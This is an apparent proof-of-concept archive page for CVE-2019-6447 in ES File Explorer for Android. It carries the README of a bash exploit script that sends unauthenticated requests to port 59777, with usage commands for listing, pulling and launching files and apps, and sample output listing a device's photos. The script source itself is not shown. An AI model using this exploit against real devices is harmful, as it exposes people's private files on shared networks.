Associated Vulnerability
Title:ES File Explorer File Manager application for Android 访问控制错误漏洞 (CVE-2019-6447)Description:The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
Description
Very basic bash script to exploit the CVE-2019-6447.
Readme
# PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)
<div align="center"><img height="150px" width="150px" src="https://img.icons8.com/ios/500/es-file-explorer.png"></img></div>
##
<p align="justify">This is a very simple implementation in bash of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447">CVE-2019-6447</a> PoC. It basically uses curl to send the requests with the right parameters. I've built it as I was looking for a similar script during a CTF and couldn't find any. You can play around with the original script and customize it the way you like it better.</p>
### Installation:
Simply clone the repository and use the .sh file.
```git
git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
```
Or copy and paste the raw content to a file.
### Usage:
```git
kyoto :: ~ % ./ESExplorerExploit.sh -h
--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---
You can try the following commands:
listFiles List all files
listPics List all pictures
listVideos List all videos
listAudios List all audios
listApps List all applications installed
listAppsSystem List system apps
listAppsPhone List communication related applications
listAppsSdcard List the apps installed on the sd card
listAppsAll List all applications
getAppThumbnail List icons for the specified application
appLaunch Start the developed application
appPull Download an application from your device
getDeviceInfo Get system information
Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles
```
### Example:
```git
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", },
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", },
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
```
### References:
In case you're curious about how this exploit works behind the scenes OR in case it fails and you have to build your own script, you can give a read to the following links:
https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html \
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln \
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf \
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566
File Snapshot
[4.0K] /data/pocs/42b431abd393a7a5da5bfc3e791bf68c79f5934e
├── [1.3K] ESExplorerExploit.sh
└── [2.7K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →